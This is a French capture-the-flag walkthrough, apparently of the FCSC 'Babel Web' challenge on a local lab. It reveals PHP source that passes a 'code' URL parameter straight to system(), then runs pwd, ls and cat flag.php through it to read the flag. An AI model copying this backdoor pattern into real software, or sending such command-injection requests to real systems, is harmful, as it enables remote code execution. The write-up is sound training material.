Table des matières
Analyse de la page
- Ouvrir ‘Outils de développement’ ou touche F12.
Dans l’onglet ‘élements’, on remarque une ligne mise en commentaire.
<!-- <a href="?source=1">source</a> -->
- Éditer le code, click-droit,
edit pageet on supprime les balises commentaires de cette ligne. - La page se recharge avec un lien source.
La page affiche un bout de code PHP, il doit y avoir une page
index.php.
<?php
if (isset($_GET['source'])) {
@show_source(__FILE__);
} else if(isset($_GET['code'])) {
print("<pre>");
@system($_GET['code']);
print("<pre>");
} else {
?>
<html>
<head>
<title>Bienvenue à Babel Web!</title>
</head>
<body>
<h1>Bienvenue à Babel Web!</h1>
La page est en cours de développement, merci de revenir plus tard.
<!-- <a href="?source=1">source</a> -->
</body>
</html>
<?php
}
?>
La suite
- dans le navigateur ouvrir l’adresse :
http://localhost:8000/index.php - le contenu ne change pas, pas d’erreur :-)
- Dans le code php, il y ifelse..code…, essayons de l’ajouter
http://localhost:8000/index.php?code
pas d’erreur, essayons de mettre une commande
http://localhost:8000/index.php?code=pwd
La réponse :
/var/www/html
vu que la commnde pwd répond, essayons de lister les fichiers
- listons les fichiers : http://localhost:8000/index.php?code=ls%20-rtla
La réponse :
total 16
drwxr-xr-x 1 root root 4096 Nov 15 2022 ..
-rw-r--r-- 1 root root 439 Apr 30 2023 index.php
-rw-r--r-- 1 root root 89 Apr 30 2023 flag.php
drwxrwxrwx 1 www-data www-data 4096 Nov 29 2023 .
- essayons
cat flag.php
http://localhost:8000/index.php?code=cat%20flag.php
on ne voit rien mais pas d’erreur, un petit tour dans les outils de développement
Dans les sources de la page, on peut voir un commentaire, composé de FCSC{.....}, Bingo ;-)